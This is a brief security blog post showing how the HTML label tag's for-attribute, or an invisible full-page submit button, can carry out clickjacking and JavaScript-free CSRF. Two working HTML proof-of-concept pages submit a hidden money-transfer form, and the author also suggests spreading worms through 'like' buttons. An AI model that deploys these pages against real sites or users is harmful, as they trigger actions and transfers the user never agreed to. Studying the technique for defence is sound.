label clickjacking and javascriptless csrf

Another niche attack. I happened to notice the interesting behaviour of the <label> tag today while working on some web application development.

1
 
<label for="target">*STUFF*</label>

The for-attribute triggers a click event on the targeted element by id. It can trigger the click events on a bunch of different input-tags whenever anything between it's start and end tags are clicked. This is an intended behaviour, but it can be abused for clickjacking.

Here is a way to abuse it for submitting csrf forms.

labelcsrf.html (Source)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
 
<!DOCTYPE HTML>
<html>
<body>
        <label for="target_element" style="display: block; height: 13370px; width: 100%;">
        </label>

        <form method="post" action="http://victim" style="display: none;" >
                <input type="text" name="moneys" value="all">
                <input type="text" name="recipient" value="evul_haxxer">
                <input id="target_element" type="submit" name="send" value="Send moneys">
        </form>
</body>

Of course, it's a bit redundant. The following snippet does the same thing without using the label tag at all.

invisbuttoncsrf.html (Source)

1
2
3
4
5
6
7
8
9
 
<!DOCTYPE HTML>
<html>
<body>
        <form method="post" action="http://victim">
                <input id="target_element" type="submit" name="send" value="Send moneys" style="display: block; height: 13370px; width: 100%; opacity: 0;">
                <input type="text" name="moneys" value="all">
                <input type="text" name="recipient" value="evul_haxxer">
        </form>
</body>

I tested both of these in firefox with noscript and they pass.

But imagine a scenario where the HTML filtering is not quite as secure as it should be and the label-tag can be submitted. Then it could be abused to trigger clicks on the rendered site without the user's consent. Imagine a social media site with a "like"-functionality alá Facebook for example. Triggering a click on the like could make for some fun Samy-like worms.

Fortunately, most sites use whitelists for html user input these days.